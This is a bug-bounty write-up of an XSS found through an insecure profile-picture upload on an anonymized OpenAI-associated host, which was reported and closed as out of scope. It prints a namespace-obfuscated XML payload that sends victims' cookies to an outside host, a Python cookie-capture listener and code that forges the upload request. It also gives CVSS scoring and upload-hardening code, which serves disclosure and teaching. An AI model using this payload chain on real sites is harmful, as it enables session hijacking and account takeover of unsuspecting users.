Hunting XSS in OpenAI: An Insecure File Upload Adventure Marked Out of Scope

Introduction

Back in September 2024, I set out to explore the security of OpenAI’s ecosystem, a platform synonymous with cutting-edge AI innovation.

What I uncovered was a fascinating vulnerability: Insecure File Upload leading to Reflected Cross-Site Scripting (XSS) on an OpenAI-associated host, anonymized here as subdomain.openai.org.

I reported it through Bugcrowd on September 6, 2024, only to have it marked as Out of Scope (OOS) and deemed “not applicable” for a reward.

While I can’t disclose specifics due to OpenAI’s policy, I’m thrilled to share the anonymized journey of this discovery—how I found it, why it mattered, and what it taught me about bug hunting.

The Bug at a Glance

The vulnerability I identified was a Reflected XSS (Non-Self) stemming from an insecure file upload feature. In essence, I could upload a malicious XML file disguised as a profile picture, which, when accessed via a crafted URL, executed arbitrary JavaScript in another user’s browser under the subdomain.openai.org domain.

This opened the door to stealing session cookies, including CSRF tokens, and potentially escalating to more severe attacks like account takeover.

While it didn’t earn a bounty or public disclosure, the process was a goldmine of learning. Here’s how it unfolded.

The Setup: A Profile Picture Gone Rogue





The adventure began on subdomain.openai.com, which redirected me to a separate host, subdomain.openai.org, after login. This site, likely used for managing projects, let users upload a profile picture from the "My Account" settings.

File uploads are a classic attack vector, so I decided to poke around.

The upload process was straightforward—select an image, submit, and it’s stored on the server. But what caught my eye was the lack of strict validation on the file type and content. Time to break out Burp Suite and see what I could get away with.

The Discovery Process





Step 1: Intercepting the Upload

I started by uploading a legitimate image and intercepting the request with Burp.

The file was sent as a Base64-encoded blob, with a Content-Type of image/*. The server accepted it, returned a success response, and provided a URL to the uploaded file under /media/someDirectory/.

So far, standard behavior.



But what if I swapped the image for something more interesting? I crafted a simple XML file containing an XSS payload:

```xml
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.location="https://mydomain.com/?c="+document.cookie)</something:script>
</body>
</html>
```
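The trick in this payload is the namespace, not the tag name. In XML the prefix (`something`) is arbitrary; what matters is the namespace URI bound to it, and a browser rendering a document served as XML treats an element named `script` in the XHTML namespace as a real script. The short Python sketch below uses the standard-library `xml.etree.ElementTree` parser as a stand-in for a browser's XML parser. It shows that the payload resolves to an XHTML `script` element even though the literal string `<script` never appears in the file, so a hypothetical upload filter that only searched for `<script` would miss it. The write-up doesn't say what checks, if any, the server actually ran.

```python
import xml.etree.ElementTree as ET

# The PoC payload from the write-up (mydomain.com is the author's placeholder).
PAYLOAD = """<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.location="https://mydomain.com/?c="+document.cookie)</something:script>
</body>
</html>"""

XHTML_NS = "http://www.w3.org/1999/xhtml"

root = ET.fromstring(PAYLOAD)

# ElementTree expands a prefixed name into "{namespace-uri}localname",
# so the arbitrary "something:" prefix disappears after parsing.
scripts = [el for el in root.iter() if el.tag == f"{{{XHTML_NS}}}script"]

# A naive substring check (hypothetical filter) finds nothing suspicious...
print("'<script' in raw file:", "<script" in PAYLOAD)  # False
# ...but the parser sees exactly one XHTML script element.
print("XHTML script elements:", len(scripts))  # 1
print("resolved tag:", scripts[0].tag)  # {http://www.w3.org/1999/xhtml}script
```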







During testing I pointed the payload at a local listener instead, so the version I ran, alert(document.location="http://0.0.0.0:8888/?c="+document.cookie), would:

- Trigger an alert in the victim’s browser.

- Redirect the page to a local Python HTTP server I’d spun up at 0.0.0.0:8888, appending the victim’s cookies as a URL parameter.
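The stock `python3 -m http.server 8888` already logs each request line, including the `?c=` query string, which is enough for a PoC. As a slightly tidier alternative, the sketch below uses Python's standard `http.server` module to decode the `c` parameter before logging it. It is an assumption about the setup, not the author's actual script; `extract_cookies`, `CaptureHandler`, and `run` are hypothetical names.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse


def extract_cookies(path: str) -> Optional[str]:
    """Return the decoded value of the 'c' query parameter, or None if absent."""
    # Recent Python versions split query strings on '&' only, so the
    # '; ' separators inside document.cookie survive intact.
    values = parse_qs(urlparse(path).query).get("c")
    return values[0] if values else None


class CaptureHandler(BaseHTTPRequestHandler):
    """Hypothetical handler: logs whatever arrives in ?c= and returns 204."""

    def do_GET(self) -> None:
        self.log_message("captured c=%r", extract_cookies(self.path))
        self.send_response(204)  # No Content: nothing for the browser to render
        self.end_headers()


def run(host: str = "0.0.0.0", port: int = 8888) -> None:
    """Listen on all interfaces, port 8888, as in the setup described above."""
    HTTPServer((host, port), CaptureHandler).serve_forever()
```

Calling `run()` starts the listener. Note that the payload concatenates `document.cookie` without `encodeURIComponent`, so characters such as `&` or `#` inside a cookie value would be mangled in transit.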

I Base64-encoded the XML, changed the Content-Type to text/xml, and sent it through the upload endpoint. To my delight, the server accepted it without complaint and stored it under the same /media/someDirectory/ tree with an .xml extension, at a path like:

https://subdomain.openai.org/media/someDirectory/128703680/profile/rzv3TsxXnnZhR85nzKxMcZz97hcnCx5HzwVgVWMkFqDG8XH69z.xml
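In code, the tampered request body amounts to something like the sketch below. The JSON field names (`content_type`, `file`), and the assumption that the body is JSON at all, are hypothetical, since the real endpoint's format isn't disclosed. The point is only that the XML is Base64-encoded exactly as an image would be, with the declared type switched from `image/*` to `text/xml`.

```python
import base64
import json

# The same XML payload as above, as it would be written to disk.
XML_PAYLOAD = """<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.location="https://mydomain.com/?c="+document.cookie)</something:script>
</body>
</html>"""


def build_upload_body(file_bytes: bytes, content_type: str) -> str:
    """Build a hypothetical JSON upload body carrying a Base64-encoded file."""
    encoded = base64.b64encode(file_bytes).decode("ascii")
    # Field names are illustrative; the real endpoint's schema is unknown.
    return json.dumps({"content_type": content_type, "file": encoded})


# Legitimate uploads declared image/*; the tampered one declares text/xml.
body = build_upload_body(XML_PAYLOAD.encode("utf-8"), "text/xml")
print(body[:80])
```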

Step 2: Triggering the XSS

Next, I sent a GET request to the uploaded file's URL. The server returned the file as XML, and the browser parsed it and rendered it as a page.

But would the JavaScript execute? To test this, I opened a private browser window, logged in as a second user, and visited the same URL. Sure enough, the alert popped up, and my Python server logged a request with the victim’s cookies.

The captured CSRF token and session ID matched the victim's cookies, proving the XSS was real and exploitable; it also meant those cookies were not flagged HttpOnly, since document.cookie cannot read HttpOnly cookies. I had a working proof-of-concept: a crafted URL that, when visited, executed arbitrary JavaScript in the context of subdomain.openai.org.

The Impact: A Window into Exploitation

This wasn’t just a harmless alert. Reflected XSS of this nature carries serious risks:

- Session Hijacking: Stealing cookies like the CSRF token and session ID could let an attacker impersonate a user, potentially reaching sensitive account features and leading to account takeover.

- Data Theft: JavaScript could scrape user data from the page or redirect to phishing sites.

- Escalation Potential: With more time, I could’ve tested for CSRF, SSRF, or even account takeover, though I stopped short given the scope constraints.

From a business perspective, this could erode trust in OpenAI’s platform, especially if attackers targeted high-profile users. The ability to disguise the malicious URL and trick users into clicking it made it particularly insidious.



Assessing the Severity: My CVSS Score

To quantify the severity, I’d assign this vulnerability a CVSS v3.1 score of 5.7 (Medium). Here’s the breakdown:

- Base Score Metrics:

  - Attack Vector (AV:N) – Network: The exploit is remote, triggered by visiting a URL.

  - Attack Complexity (AC:L) – Low: Crafting and uploading the malicious file is straightforward; the need for the victim to click the link is captured separately under User Interaction.

  - Privileges Required (PR:L) – Low: The attacker needs a registered account to upload the file, a low bar for entry.

  - User Interaction (UI:R) – Required: The victim must visit the crafted URL, introducing a social engineering element.

  - Scope (S:U) – Unchanged: The impact is confined to the subdomain.openai.org domain, not escalating to other systems.

  - Confidentiality (C:H) – High: Cookie theft exposes session data.

  - Integrity (I:N) – None: No direct integrity impact.

  - Availability (A:N) – None: No direct denial-of-service impact.

- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

- Score: 5.7 – A Medium severity rating, reflecting the need for user interaction balanced against the ease of exploitation and potential for session hijacking.
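The 5.7 can be reproduced from the vector with the CVSS v3.1 base-score equations. The Python sketch below is a minimal, unofficial transcription of those equations, with the metric weights and the Roundup function as published in FIRST's v3.1 specification. It is not a tool the author used, and it covers base metrics only (no temporal or environmental scores).

```python
import math

# CVSS v3.1 base metric weights (FIRST specification).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required depends on whether Scope is Unchanged (U) or Changed (C).
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    int_input = round(value * 100000)  # guards against float noise
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    # "CVSS:3.1/AV:N/..." -> {"AV": "N", ...}, skipping the version prefix.
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    scope = metrics["S"]

    # Impact Sub-Score from the three CIA metrics.
    iss = 1 - ((1 - WEIGHTS["C"][metrics["C"]])
               * (1 - WEIGHTS["I"][metrics["I"]])
               * (1 - WEIGHTS["A"][metrics["A"]]))
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15

    exploitability = (8.22 * WEIGHTS["AV"][metrics["AV"]]
                      * WEIGHTS["AC"][metrics["AC"]]
                      * PR_WEIGHTS[scope][metrics["PR"]]
                      * WEIGHTS["UI"][metrics["UI"]])

    if impact <= 0:
        return 0.0
    if scope == "U":
        return roundup(min(impact + exploitability, 10))
    return roundup(min(1.08 * (impact + exploitability), 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"))  # prints 5.7
```

With Scope Unchanged, Impact = 6.42 × 0.56 ≈ 3.60 and Exploitability = 8.22 × 0.85 × 0.77 × 0.62 × 0.62 ≈ 2.07; their sum, about 5.66, rounds up to 5.7.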

Reporting and the OOS Verdict







I submitted the bug to OpenAI via Bugcrowd on September 6, 2024, at 18:29:18 UTC, targeting *.openai.org under the API Testing category. My report included detailed steps, screenshots, and a clear PoC. I suggested a P3 priority based on the Bugcrowd Vulnerability Rating Taxonomy (VRT) entry for Reflected XSS (Non-Self), given its moderate severity.

Three days later, on September 9, 2024, OpenAI closed the submission as “Not Applicable,” marking it OOS. No reward, no further explanation beyond the standard notice. While disappointing, I suspect it was due to subdomain.openai.org being a third-party service not fully under OpenAI’s bounty scope.

The engagement’s “no disclosure” policy also means I can’t share the raw details publicly, but I can still reflect on the experience.

Lessons Learned

This hunt taught me a few valuable lessons:

- File Uploads Are Goldmines: Weak validation is a common XSS entry point. Always test what the server accepts and how it handles it.

- Scope is King: Even a solid bug can fall outside a program’s boundaries. Reading the fine print saves heartache.

- Persistence Pays Off: OOS doesn’t diminish the skill it took to find this. Every hunt sharpens your instincts.

For developers, this is a reminder to sanitize uploads rigorously—check file types, strip executable content, and avoid rendering user-controlled files directly. For bug hunters, it’s a nudge to clarify scope upfront, especially with subdomains.
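As a minimal sketch of the first and last of those points, assuming a Python backend (the site's actual stack is unknown), the hypothetical helpers below decide what a stored profile picture may be served as by checking its leading magic bytes, rather than trusting the client's declared type or the file extension. They then attach headers that keep a browser from treating the file as a document that can run script. Re-encoding every upload with an image library is a stronger way to strip embedded content, but it is not shown here.

```python
from typing import Dict, Optional

# Leading "magic bytes" of the raster formats a profile picture should be.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def sniff_image_type(data: bytes) -> Optional[str]:
    """Return an image MIME type derived from the file content, or None."""
    for signature, mime in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return mime
    return None


def response_headers_for(data: bytes) -> Dict[str, str]:
    """Headers for serving a stored upload; raises ValueError for non-images."""
    mime = sniff_image_type(data)
    if mime is None:
        raise ValueError("upload is not a PNG, JPEG or GIF image")
    return {
        # Use the type derived from the bytes, never the client-supplied one.
        "Content-Type": mime,
        # Tell browsers not to MIME-sniff the file into something else.
        "X-Content-Type-Options": "nosniff",
        # Defence in depth: no script runs even if the file is opened directly.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
```

Under this check, the XML payload from this write-up is rejected at upload time because it starts with `<html>` rather than an image signature.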

Final Thoughts

Though this XSS didn’t land a bounty or a fix (that I know of), it was a thrilling dive into OpenAI’s ecosystem. Uncovering a path from an innocent profile picture to a cookie-stealing payload felt like cracking a puzzle—one that could’ve had real-world bite in the right hands.

I respect OpenAI’s call on scope and their no-disclosure stance, but I hope this anonymized tale inspires fellow hunters to keep probing the edges of the digital frontier.

HAPPY HUNTING!!!!